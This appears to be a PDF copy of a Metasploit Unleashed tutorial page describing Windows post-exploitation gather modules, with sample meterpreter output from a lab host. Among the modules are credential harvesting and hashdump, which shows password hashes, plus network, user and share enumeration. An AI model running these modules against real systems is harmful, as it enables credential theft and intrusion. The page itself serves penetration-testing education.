Windows Post Gather Modules
Windows Post Gather Modules
arp_scanner
The “arp_scanner” post module will perform an ARP scan for a given range through a compromised host.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
[*] IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*]
[*]
IP: 192.168.1.221 MAC 0:c:29:d7:55:f
IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >
checkvm
The “checkvm” post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen,
and QEMU virtual machines.
credential_collector
The “credential_collector” module harvests passwords hashes and tokens on the compromised host.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
dumplinks
The “dumplinks” module parses the .lnk les in a users Recent Documents which could be useful for further information gathering. Note that, as shown below, we
rst need to migrate into a user process prior to running the module.
enum_applications
The “enum_applications” module enumerates the applications that are installed on the compromised host.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN7-X86
Installed Applications
======================
Name Version
---- -------
Adobe Flash Player 25 ActiveX 25.0.0.148
Google Chrome 58.0.3029.81
Google Update Helper 1.3.33.5
Google Update Helper 1.3.25.11
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
MySQL Connector Net 6.5.4 6.5.4
Security Update for Microsoft .NET Framework 4.6.1 (KB3122661) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3127233) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2) 2
Security Update for Microsoft .NET Framework 4.6.1 (KB3142037) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3143693) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3164025) 1
Update for Microsoft .NET Framework 4.6.1 (KB3210136) 1
Update for Microsoft .NET Framework 4.6.1 (KB4014553) 1
VMware Tools 10.1.6.5214329
XAMPP 1.8.1-0 1.8.1-0
enum_logged_on_users
The “enum_logged_on_users” post module returns a listing of current and recently logged on users along with their SIDs.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 1
SID User
--- ----
S-1-5-21-628913648-3499400826-3774924290-1000 WIN7-X86\victim
S-1-5-21-628913648-3499400826-3774924290-1004 WIN7-X86\hacker
meterpreter >
enum_shares
The “enum_shares” post module returns a listing of both con gured and recently used shares on the compromised system.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
[*] The following shares were found:
[*]
[*]
Name: Desktop
Path: C:\Documents and Settings\Administrator\Desktop
[*] Type: 0
[*]
[*] Recent Mounts found:
[*] \\192.168.1.250\software
[*] \\192.168.1.250\Data
[*]
meterpreter >
enum_snmp
The “enum_snmp” module will enumerate the SNMP service con guration on the target, if present, including the community strings.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
hashdump
The “hashdump” post module will dump the local users accounts on the compromised host using the registry.
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
usb_history
The “usb_history” module enumerates the USB drive history on the compromised system.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
Disk lpftLastWriteTime Thu Apr 21 13:09:42 -0600 2011
Volume lpftLastWriteTime Thu Apr 21 13:09:43 -0600 2011
Manufacturer (Standard disk drives)
ParentIdPrefix 8&3a01dffe&0 ( E:)
Class DiskDrive
Driver {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
meterpreter >
local_exploit_suggester
The “local_exploit_suggester”, or Lester for short, scans a system for local vulnerabilities contained in Metasploit. It then makes suggestions based on the results
as well as displays exploit’s location for quicker access.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
MSFU Navigation
Metasploit Unleashed Donate – Help Feed a Child Introduction Metasploit Fundamentals Information Gathering Vulnerability Scanning
Writing a Simple Fuzzer Exploit Development Web App Exploit Dev Client Side Attacks MSF Post Exploitation Meterpreter Scripting
Maintaining Access MSF Extended Usage Metasploit GUIs Post Module Reference Auxiliary Module Reference Recent Changes
Offensive Security Twitter Feed Offsec Say Try Harder! Kali Linux Twitter Feed
00:00 00:00
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Tweets by @offsectraining Tweets by @kalilinux
Offensive Security Retweeted Kali Linux Retweeted
New Kali Linux 2018.2 release, hot out of the oven! .@calm just went full @kalilinux and it made my day
offs.ec/2FwnzsU
May 1, 2018
Kali Linux Retweeted
Copyright © 2018 O ensive Security Feedback Privacy Policy Terms and Conditions Trademark Policy
RSS Feed
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD